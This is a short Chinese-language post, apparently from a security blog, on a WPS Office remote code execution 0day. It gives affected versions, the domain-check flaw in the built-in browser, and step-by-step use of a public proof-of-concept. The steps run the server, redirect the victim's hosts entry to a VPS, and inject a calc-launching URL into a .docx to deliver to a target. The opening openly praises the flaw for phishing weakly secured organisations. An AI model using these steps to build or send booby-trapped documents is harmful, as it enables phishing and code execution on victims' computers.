这个day是今年国护的时候爆出来的,虽然国护已经过去很久但是这个day的杀伤力依旧很大,许多单位安全意识很薄,借助这个0day钓鱼可谓是屡试不爽。 漏洞影响 WPS Office 2023个人版<11.1.0.15120;WPS Office 2019企业版<11.8.2.1208 漏洞原理 WPS 有内置浏览器,当打开该文档时, WPS 就会通过内置浏览器加载该链接。而有漏洞的版本对域名clientweb.docer.wps.cn.{xxxxx}wps.cn不进行检测,因而可以借助这个逻辑漏洞完成绕过。 复现准备: 本地复现 下载poc,需要python3.8以上的版本 https://github.com/ba0gu0/wps-rce 执行以下命令安装依赖文件 cd wps_rce 在server文件夹下运行 python3 main.py 访问url 在受害主机上添加host vpsip clientweb.docer.wps.cn. 因此弹出计算器的payload为 http://clientweb.docer.wps.cn./calc 进入client文件夹运行 python main.py test.docx http://clientweb.docer.wps.cn./calc test是要注入payload的文档 生成带有命令的payload到目标主机上运行
|
|